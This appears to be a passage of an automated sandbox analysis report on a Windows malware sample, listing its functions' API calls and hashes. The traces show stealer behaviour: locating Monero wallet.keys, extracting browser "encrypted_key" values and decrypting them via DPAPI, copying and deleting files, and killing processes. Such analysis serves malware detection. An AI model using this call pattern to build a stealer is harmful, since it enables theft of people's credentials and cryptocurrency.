                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 00508B60: GetSystemTime.KERNEL32(00510E1A,012D9AC8,005105AE,?,?,004F13F9,?,0000001A,00510E1A,00000000,?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 00508B86
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004FD481
                                • lstrlen.KERNEL32(00000000), ref: 004FD698
                                • lstrlen.KERNEL32(00000000), ref: 004FD6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 004FD72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: e6e8dc65938d0e796f916fea7547576c1e742ba411895db71d4682ae47374bf1
                                • Instruction ID: 93a6c4385626bdc9768ce584729f6bb1905cb25e9b82a9daa1e47d24136d8cb4
                                • Opcode Fuzzy Hash: e6e8dc65938d0e796f916fea7547576c1e742ba411895db71d4682ae47374bf1
                                • Instruction Fuzzy Hash: BA9135729102099BDB04FBA0DD9AEEE7738BF94300F508569F507B60D1EF346A49CB66
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 00508B60: GetSystemTime.KERNEL32(00510E1A,012D9AC8,005105AE,?,?,004F13F9,?,0000001A,00510E1A,00000000,?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 00508B86
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004FD801
                                • lstrlen.KERNEL32(00000000), ref: 004FD99F
                                • lstrlen.KERNEL32(00000000), ref: 004FD9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 004FDA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 52c5f8b88498a41bd6f7d0ed7b59c4d9d7e85032cff0cdcd0a784a1078e8412d
                                • Instruction ID: 915c56758af456ec62a5f917a4d94e2ee9f47770cbb78c142e8921d15755af60
                                • Opcode Fuzzy Hash: 52c5f8b88498a41bd6f7d0ed7b59c4d9d7e85032cff0cdcd0a784a1078e8412d
                                • Instruction Fuzzy Hash: AE8104729102099BDB04FBB4DD9AEEE7B38BF94300F508519F547A60D1EF346A09CB66
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 163dc156244e544f65fa18ede2e1da686d11a5e257e38575cb7c35e7e5bdb673
                                • Instruction ID: d50a96fca61134b9ac43fd72d2690a88a8fe6b7ae8e0d73783004d9bc6c287b5
                                • Opcode Fuzzy Hash: 163dc156244e544f65fa18ede2e1da686d11a5e257e38575cb7c35e7e5bdb673
                                • Instruction Fuzzy Hash: 27411F71D10209ABDB04EFA4D88AEFEBB78BF54304F008418E516662D0EB75AA45CFA1
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 004F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F99EC
                                  • Part of subcall function 004F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004F9A11
                                  • Part of subcall function 004F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004F9A31
                                  • Part of subcall function 004F99C0: ReadFile.KERNEL32(000000FF,?,00000000,004F148F,00000000), ref: 004F9A5A
                                  • Part of subcall function 004F99C0: LocalFree.KERNEL32(004F148F), ref: 004F9A90
                                  • Part of subcall function 004F99C0: CloseHandle.KERNEL32(000000FF), ref: 004F9A9A
                                  • Part of subcall function 00508E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00508E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004F9D39
                                  • Part of subcall function 004F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NO,00000000,00000000), ref: 004F9AEF
                                  • Part of subcall function 004F9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,004F4EEE,00000000,?), ref: 004F9B01
                                  • Part of subcall function 004F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NO,00000000,00000000), ref: 004F9B2A
                                  • Part of subcall function 004F9AC0: LocalFree.KERNEL32(?,?,?,?,004F4EEE,00000000,?), ref: 004F9B3F
                                  • Part of subcall function 004F9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004F9B84
                                  • Part of subcall function 004F9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 004F9BA3
                                  • Part of subcall function 004F9B60: LocalFree.KERNEL32(?), ref: 004F9BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 0627715bd5d653d363c9dd0f374fa005081b25cc60868bdd9187db7e7e4c1992
                                • Instruction ID: b118b69144e23ae8491b628b1ef8d1908932df071c7db525aac66f50b3bf9856
                                • Opcode Fuzzy Hash: 0627715bd5d653d363c9dd0f374fa005081b25cc60868bdd9187db7e7e4c1992
                                • Instruction Fuzzy Hash: 99312DB5D1020EABDB14EBA4DC85FFFB7B8BB48304F144559EA05A7241E7349E04CBA5
                                APIs
                                • memset.MSVCRT ref: 005094EB
                                  • Part of subcall function 00508D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0050951E,00000000), ref: 00508D5B
                                  • Part of subcall function 00508D50: RtlAllocateHeap.NTDLL(00000000), ref: 00508D62
                                  • Part of subcall function 00508D50: wsprintfW.USER32 ref: 00508D78
                                • OpenProcess.KERNEL32(00001001,00000000,?), ref: 005095AB
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 005095C9
                                • CloseHandle.KERNEL32(00000000), ref: 005095D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                • String ID:
                                • API String ID: 3729781310-0
                                • Opcode ID: 73e12e7c1cb6feefeca42b2a645c0694c48470796fdd073ee5f78c56ab2ece36
                                • Instruction ID: d3940e824783b65ed0b5c582d8e5a2812f9b3bf7dc1249c146922bf2009d6741
                                • Opcode Fuzzy Hash: 73e12e7c1cb6feefeca42b2a645c0694c48470796fdd073ee5f78c56ab2ece36
                                • Instruction Fuzzy Hash: 67311E71A01208AFDB14DFD0CD4ABEDB774FF44301F108459E506AA1C9DB789A49CB55
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005105B7), ref: 005086CA
                                • Process32First.KERNEL32(?,00000128), ref: 005086DE
                                • Process32Next.KERNEL32(?,00000128), ref: 005086F3
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • CloseHandle.KERNEL32(?), ref: 00508761
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: b0d417c244eaa9a1461150b02029430b9c40f1b7697285dac5026c380f382dc3
                                • Instruction ID: a3c25fbfc955fd6bf35174cec99b6323f0f3f9133c8170cd3ff314c8b3d8eddc
                                • Opcode Fuzzy Hash: b0d417c244eaa9a1461150b02029430b9c40f1b7697285dac5026c380f382dc3
                                • Instruction Fuzzy Hash: 60315C71901219ABDB24DF50CC45FEEBB78FF85700F108599A10AA21E0DB746A45CFA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00510E00,00000000,?), ref: 005079B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 005079B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00510E00,00000000,?), ref: 005079C4
                                • wsprintfA.USER32 ref: 005079F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 59a3401c5b9d8dbf36c47bc29df83552014fa7848ba0002fb234a95d96153ff9
                                • Instruction ID: 91e10bf022c19499b8f85bd9762f11b4133d41e162297fa71118282fa7f4113d
                                • Opcode Fuzzy Hash: 59a3401c5b9d8dbf36c47bc29df83552014fa7848ba0002fb234a95d96153ff9
                                • Instruction Fuzzy Hash: B9112AB2904118ABDB14DFC9DD46BBEBBF8FB4CB12F10811AF645A2280D23D5940CBB5
                                APIs
                                • __getptd.LIBCMT ref: 0050C74E
                                  • Part of subcall function 0050BF9F: __amsg_exit.LIBCMT ref: 0050BFAF
                                • __getptd.LIBCMT ref: 0050C765
                                • __amsg_exit.LIBCMT ref: 0050C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0050C797
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: c60e411f21fd839c119fa28192138bb2b2b298377100a930a607090a16b83136
                                • Instruction ID: 67b8918670c8c310a7e3a3293c1509bc9a6af4b4e77d8c42675c7f0ca51c4108
                                • Opcode Fuzzy Hash: c60e411f21fd839c119fa28192138bb2b2b298377100a930a607090a16b83136
                                • Instruction Fuzzy Hash: 79F09A329407029BE721BBB8988FB8E3FA0BF81720F20424DF414A72D2DB6469419E56
                                APIs
                                  • Part of subcall function 00508DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00508E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00504F7A
                                • lstrcat.KERNEL32(?,00511070), ref: 00504F97
                                • lstrcat.KERNEL32(?,012D8AA0), ref: 00504FAB
                                • lstrcat.KERNEL32(?,00511074), ref: 00504FBD
                                  • Part of subcall function 00504910: wsprintfA.USER32 ref: 0050492C
                                  • Part of subcall function 00504910: FindFirstFileA.KERNEL32(?,?), ref: 00504943
                                  • Part of subcall function 00504910: StrCmpCA.SHLWAPI(?,00510FDC), ref: 00504971
                                  • Part of subcall function 00504910: StrCmpCA.SHLWAPI(?,00510FE0), ref: 00504987
                                  • Part of subcall function 00504910: FindNextFileA.KERNEL32(000000FF,?), ref: 00504B7D
                                  • Part of subcall function 00504910: FindClose.KERNEL32(000000FF), ref: 00504B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: d6368f37666929ee00c9987c5a5158b7562525fc91352ef66726201a8fddb610
                                • Instruction ID: 71cea2ca14f7d2265ed7f9ecab251b44992c023565e6848259ef776742740044
                                • Opcode Fuzzy Hash: d6368f37666929ee00c9987c5a5158b7562525fc91352ef66726201a8fddb610
                                • Instruction Fuzzy Hash: 1D219876900209B7D754FB70DC4BEED373CBB94301F008558B6DA921D1EE799AC88B96